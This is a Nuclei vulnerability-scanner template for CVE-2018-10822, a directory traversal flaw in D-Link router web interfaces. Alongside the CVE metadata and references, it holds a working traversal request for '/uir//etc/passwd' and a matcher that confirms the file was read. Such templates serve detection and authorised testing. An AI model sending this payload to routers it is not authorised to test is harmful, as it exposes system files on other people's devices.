my-nuclei-templates/CVE-2018-10822.yaml

35 lines
1.1 KiB
YAML
Raw Normal View History

2021-07-27 00:25:17 +00:00
id: CVE-2018-10822
info:
name: D-Link Routers - Directory Traversal
author: daffainfo
severity: high
2022-06-18 08:05:25 +00:00
description: Directory traversal vulnerability in the web interface on D-Link routers DWR-116 through 1.06, DIR-140L through 1.02, DIR-640L through 1.02,DWR-512 through 2.02,DWR-712 through 2.02,DWR-912 through 2.02, DWR-921 through 2.02, DWR-111 through 1.01, and probably others with the same type of firmware allows remote attackers to read arbitrary files via a /.. or // after "GET /uir" in an HTTP request.
2021-09-02 08:03:02 +00:00
reference:
2021-07-27 00:25:17 +00:00
- https://www.exploit-db.com/exploits/45678
- https://nvd.nist.gov/vuln/detail/CVE-2018-10822
2022-06-18 08:05:25 +00:00
- https://seclists.org/fulldisclosure/2018/Oct/36
- http://sploit.tech/2018/10/12/D-Link.html
2021-09-17 06:03:58 +00:00
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
2022-06-18 08:05:25 +00:00
cvss-score: 7.5
2021-09-17 06:03:58 +00:00
cve-id: CVE-2018-10822
cwe-id: CWE-22
2022-06-18 08:05:25 +00:00
tags: cve,cve2018,lfi,router,dlink
2021-07-27 00:25:17 +00:00
requests:
- method: GET
path:
- "{{BaseURL}}/uir//etc/passwd"
matchers-condition: and
matchers:
- type: regex
regex:
2022-06-18 08:05:25 +00:00
- "root:.*:0:0:"
2021-07-27 00:25:17 +00:00
- type: status
status:
- 200